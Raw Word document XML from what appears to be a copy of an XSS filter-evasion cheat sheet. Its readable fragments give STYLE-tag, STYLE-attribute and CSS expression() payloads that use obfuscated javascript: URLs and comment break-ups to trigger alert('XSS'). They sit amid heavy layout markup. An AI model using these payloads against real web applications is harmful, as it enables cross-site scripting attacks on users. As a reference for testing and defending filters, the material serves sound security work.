                        </w:r>
                        <w:hyperlink r:id="rId35" w:anchor="xss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http://xss.rocks/xssmoz.xml#xss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")}&lt;/STYLE&gt;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rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>STYLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Tags</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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t>Broken-up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript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XSS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ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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times</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>sends</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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infinite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>loop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alerts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9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9689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160020</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2832100" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="788" name="Group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16205"/>
                          <a:chOff x="1614" y="252"/>
                          <a:chExt cx="4460" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="789" name="Freeform 791"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="252"/>
                            <a:ext cx="4460" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 6052 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4460"/>
                              <a:gd name="T2" fmla="+- 0 434 252"/>
                              <a:gd name="T3" fmla="*/ 434 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4460"/>
                              <a:gd name="T6" fmla="+- 0 434 252"/>
                              <a:gd name="T7" fmla="*/ 434 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4460"/>
                              <a:gd name="T10" fmla="+- 0 434 252"/>
                              <a:gd name="T11" fmla="*/ 434 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4460"/>
                              <a:gd name="T14" fmla="+- 0 413 252"/>
                              <a:gd name="T15" fmla="*/ 413 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4460"/>
                              <a:gd name="T18" fmla="+- 0 410 252"/>
                              <a:gd name="T19" fmla="*/ 410 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4460"/>
                              <a:gd name="T22" fmla="+- 0 273 252"/>
                              <a:gd name="T23" fmla="*/ 273 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4460"/>
                              <a:gd name="T26" fmla="+- 0 252 252"/>
                              <a:gd name="T27" fmla="*/ 252 h 183"/>
                              <a:gd name="T28" fmla="+- 0 6052 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4460"/>
                              <a:gd name="T30" fmla="+- 0 252 252"/>
                              <a:gd name="T31" fmla="*/ 252 h 183"/>
                              <a:gd name="T32" fmla="+- 0 6073 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4460"/>
                              <a:gd name="T34" fmla="+- 0 273 252"/>
                              <a:gd name="T35" fmla="*/ 273 h 183"/>
                              <a:gd name="T36" fmla="+- 0 6073 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4460"/>
                              <a:gd name="T38" fmla="+- 0 413 252"/>
                              <a:gd name="T39" fmla="*/ 413 h 183"/>
                              <a:gd name="T40" fmla="+- 0 6055 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4460"/>
                              <a:gd name="T42" fmla="+- 0 434 252"/>
                              <a:gd name="T43" fmla="*/ 434 h 183"/>
                              <a:gd name="T44" fmla="+- 0 6052 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4460"/>
                              <a:gd name="T46" fmla="+- 0 434 252"/>
                              <a:gd name="T47" fmla="*/ 43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460" h="183">
                                <a:moveTo>
                                  <a:pt x="443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438" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4459" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4459" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4441" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="44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Text Box 790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2"/>
                            <a:ext cx="446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&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert("XSS")';&lt;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/STYLE&gt;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9" o:spid="_x0000_s1641" style="position:absolute;margin-left:80.7pt;margin-top:12.6pt;width:223pt;height:9.15pt;z-index:-15619584;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,252" coordsize="446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">
                <v:shape id="Freeform 791" o:spid="_x0000_s1642" style="position:absolute;left:1614;top:252;width:4460;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="446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lWGsEA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzarCMBSE94LvEI7gTlNd2FqNIl4El/4tXB6aY1Ns&#10;TkqTq9WnN8KFuxxm5htmue5sLR7U+sqxgsk4AUFcOF1xqeBy3o0yED4ga6wdk4IXeViv+r0l5to9&#10;+UiPUyhFhLDPUYEJocml9IUhi37sGuLo3VxrMUTZllK3+IxwW8tpksykxYrjgsGGtoaK++nXKrhR&#10;Vqa8IZMW1+Ph8g4/55d+KzUcdJsFiEBd+A//tfdaQZrN4XsmHgG5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5VhrBAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m4438,182l21,182r-3,l,161r,-3l,21,21,,4438,r21,21l4459,161r-18,21l4438,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4438,434;21,434;18,434;0,413;0,410;0,273;21,252;4438,252;4459,273;4459,413;4441,434;4438,434" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 790" o:spid="_x0000_s1643" type="#_x0000_t202" style="position:absolute;left:1614;top:252;width:446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8GkMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m6keulmNpcgEYTBWu8OOz+bZ&#10;hjYvXRO1+++Xw2DHj+/3Np9sL240euNYwXKRgCCunTbcKPisDk8vIHxA1tg7JgU/5CHfzR62mGl3&#10;55Jup9CIGMI+QwVtCEMmpa9bsugXbiCO3MWNFkOEYyP1iPcYbnu5SpJUWjQcG1ocaN9S3Z2uVkHx&#10;xeWr+X4/f5SX0lTVOuG3tFPqcT4VGxCBpvAv/nMftYLndZwfz8Q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58GkM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&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert("XSS")';&lt;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/STYLE&gt;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STYLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Attribute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Comment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Break-up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Expression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ind w:left="154"/>
      </w:pPr>
      <w:r>
        <w:t>Created</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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Roman</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Ivanov</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="9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9740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2669540" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="785" name="Group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9540" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="4204" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="786" name="Freeform 788"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="240"/>
                            <a:ext cx="4204" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5797 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4204"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4204"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4204"/>
                              <a:gd name="T10" fmla="+- 0 422 240"/>
                              <a:gd name="T11" fmla="*/ 422 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4204"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4204"/>
                              <a:gd name="T18" fmla="+- 0 398 240"/>
                              <a:gd name="T19" fmla="*/ 398 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4204"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4204"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5797 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4204"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5818 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4204"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5818 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4204"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5800 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4204"/>
                              <a:gd name="T42" fmla="+- 0 422 240"/>
                              <a:gd name="T43" fmla="*/ 422 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5797 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4204"/>
                              <a:gd name="T46" fmla="+- 0 422 240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204" h="183">
                                <a:moveTo>
                                  <a:pt x="418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183" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4204" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4204" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4186" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="418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Text Box 78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0"/>
                            <a:ext cx="420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STYLE="xss:expr/*XSS*/ession(alert('XSS'))"&gt;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6" o:spid="_x0000_s1644" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:210.2pt;height:9.15pt;z-index:-15619072;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="420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">
                <v:shape id="Freeform 788" o:spid="_x0000_s1645" style="position:absolute;left:1614;top:240;width:4204;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="420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nZesYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxYGpTVxGL0FAQqiL09pp9&#10;JsHs27C7TeK/7xYKPQ4z8w2z2gymER05X1tWMJ8lIIgLq2suFZxP++kShA/IGhvLpOBOHjbr8WiF&#10;mbY9f1B3DKWIEPYZKqhCaDMpfVGRQT+zLXH0rtYZDFG6UmqHfYSbRj4mSSoN1hwXKmxpV1FxO34b&#10;Bc+fh/SwK/vL++vl7vKvLs+5WCj1MBm2LyACDeE//Nd+0wqelin8nolH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WnZesYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m4183,182l21,182r-3,l,161r,-3l,21,21,,4183,r21,21l4204,161r-18,21l4183,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4183,422;21,422;18,422;0,401;0,398;0,261;21,240;4183,240;4204,261;4204,401;4186,422;4183,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 787" o:spid="_x0000_s1646" type="#_x0000_t202" style="position:absolute;left:1614;top:240;width:420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8IOcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXmF3nRTD2pTNyJSQSiUxnjw+Jp9&#10;Jkuyb9Psqum/7wpCj8PMfMOs1oNtxZV6bxwreJkmIIhLpw1XCo7FbrIE4QOyxtYxKfglD+tsPFph&#10;qt2Nc7oeQiUihH2KCuoQulRKX9Zk0U9dRxy9s+sthij7SuoebxFuWzlLkrm0aDgu1NjRtqayOVys&#10;gs2J83fz8/n9lZ9zUxSvCX/MG6Wen4bNG4hAQ/gPP9p7rWCxXMD9TDw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rwg5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STYLE="xss:expr/*XSS*/ession(alert('XSS'))"&gt;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IMG</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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Expression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3" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="21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9792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420370</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="386080"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="782" name="Group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386080"/>
                          <a:chOff x="1614" y="662"/>
                          <a:chExt cx="8700" cy="608"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="783" name="Freeform 785"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="662"/>
                            <a:ext cx="8700" cy="608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1270 662"/>
                              <a:gd name="T3" fmla="*/ 1270 h 608"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 1270 662"/>
                              <a:gd name="T7" fmla="*/ 1270 h 608"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 1269 662"/>
                              <a:gd name="T11" fmla="*/ 1269 h 608"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 1249 662"/>
                              <a:gd name="T15" fmla="*/ 1249 h 608"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 1246 662"/>
                              <a:gd name="T19" fmla="*/ 1246 h 608"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 683 662"/>
                              <a:gd name="T23" fmla="*/ 683 h 608"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 662 662"/>
                              <a:gd name="T27" fmla="*/ 662 h 608"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 662 662"/>
                              <a:gd name="T31" fmla="*/ 662 h 608"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 683 662"/>
                              <a:gd name="T35" fmla="*/ 683 h 608"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 1249 662"/>
                              <a:gd name="T39" fmla="*/ 1249 h 608"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 1269 662"/>
                              <a:gd name="T43" fmla="*/ 1269 h 608"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 1270 662"/>
                              <a:gd name="T47" fmla="*/ 1270 h 6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608">
                                <a:moveTo>
                                  <a:pt x="8679" y="608"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="608"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="587"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="584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587"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="607"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="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Text Box 784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662"/>
                            <a:ext cx="8700" cy="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spacing w:line="312" w:lineRule="auto"/>
                                <w:ind w:left="165" w:right="4343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exp/*&lt;A STYLE='no\xss:noxss("*//*");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xss:ex/*XSS*//*/*/pression(alert("XSS"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))'&gt;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3" o:spid="_x0000_s1647" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:33.1pt;width:435pt;height:30.4pt;z-index:-15618560;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,662" coordsize="8700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">
                <v:shape id="Freeform 785" o:spid="_x0000_s1648" style="position:absolute;left:1614;top:662;width:8700;height:608;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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BPRcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/IEL6VutKCSugmlIEihoNGLt0f2&#10;mQ3Jvl2yq6b/vlso9DjMzDfMthxtL+40hNaxgsU8A0FcO91yo+B82r1sQISIrLF3TAq+KUBZTJ62&#10;mGv34CPdq9iIBOGQowITo8+lDLUhi2HuPHHyrm6wGJMcGqkHfCS47eUyy1bSYstpwaCnD0N1V92s&#10;gvHL7PbPl8/rsVt5V63doWN/UGo2Hd/fQEQa43/4r73XCtabV/g9k46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gE9FxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m8679,608l21,608r-3,-1l,587r,-3l,21,21,,8679,r21,21l8700,587r-18,20l8679,608xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,1270;21,1270;18,1269;0,1249;0,1246;0,683;21,662;8679,662;8700,683;8700,1249;8682,1269;8679,1270" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 784" o:spid="_x0000_s1649" type="#_x0000_t202" style="position:absolute;left:1614;top:662;width:8700;height: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2WTsUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3upGEWujq4hUEARpTA89vmaf&#10;yWL2bZrdavz3riB4HGbmG2a+7GwtztR641jBcJCAIC6cNlwq+M43b1MQPiBrrB2Tgit5WC56L3NM&#10;tbtwRudDKEWEsE9RQRVCk0rpi4os+oFriKN3dK3FEGVbSt3iJcJtLUdJMpEWDceFChtaV1ScDv9W&#10;weqHs0/zt//9yo6ZyfOPhHeTk1Kv/W41AxGoC8/wo73VCt6nY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fZZOxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA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spacing w:line="312" w:lineRule="auto"/>
                          <w:ind w:left="165" w:right="4343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exp/*&lt;A STYLE='no\xss:noxss("*//*");</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="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xss:ex/*XSS*//*/*/pression(alert("XSS"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))'&gt;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really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hybrid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vectors,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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really</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>how</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>hard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>STYLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tags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parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>apart,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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loop:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="111"/>
      </w:pPr>
      <w:r>
        <w:t>STYLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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(Older</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>only)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="11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9843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161290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2777490" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="779" name="Group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7490" cy="116205"/>
                          <a:chOff x="1614" y="254"/>
                          <a:chExt cx="4374" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="780" name="Freeform 782"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="254"/>
                            <a:ext cx="4374" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5967 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 4374"/>
                              <a:gd name="T2" fmla="+- 0 437 254"/>
                              <a:gd name="T3" fmla="*/ 437 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 4374"/>
                              <a:gd name="T6" fmla="+- 0 437 254"/>
                              <a:gd name="T7" fmla="*/ 437 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 4374"/>
                              <a:gd name="T10" fmla="+- 0 436 254"/>
                              <a:gd name="T11" fmla="*/ 436 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 4374"/>
                              <a:gd name="T14" fmla="+- 0 416 254"/>
                              <a:gd name="T15" fmla="*/ 416 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 4374"/>
                              <a:gd name="T18" fmla="+- 0 412 254"/>
                              <a:gd name="T19" fmla="*/ 412 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 4374"/>
                              <a:gd name="T22" fmla="+- 0 276 254"/>
                              <a:gd name="T23" fmla="*/ 276 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 4374"/>
                              <a:gd name="T26" fmla="+- 0 254 254"/>
                              <a:gd name="T27" fmla="*/ 254 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5967 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 4374"/>
                              <a:gd name="T30" fmla="+- 0 254 254"/>
                              <a:gd name="T31" fmla="*/ 254 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5988 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 4374"/>
                              <a:gd name="T34" fmla="+- 0 276 254"/>
                              <a:gd name="T35" fmla="*/ 276 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5988 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 4374"/>
                              <a:gd name="T38" fmla="+- 0 416 254"/>
                              <a:gd name="T39" fmla="*/ 416 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5970 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 4374"/>
                              <a:gd name="T42" fmla="+- 0 436 254"/>
                              <a:gd name="T43" fmla="*/ 436 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5967 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 4374"/>
                              <a:gd name="T46" fmla="+- 0 437 254"/>
                              <a:gd name="T47" fmla="*/ 43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374" h="183">
                                <a:moveTo>
                                  <a:pt x="4353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4353" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4374" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4374" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4356" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4353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Text Box 781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4"/>
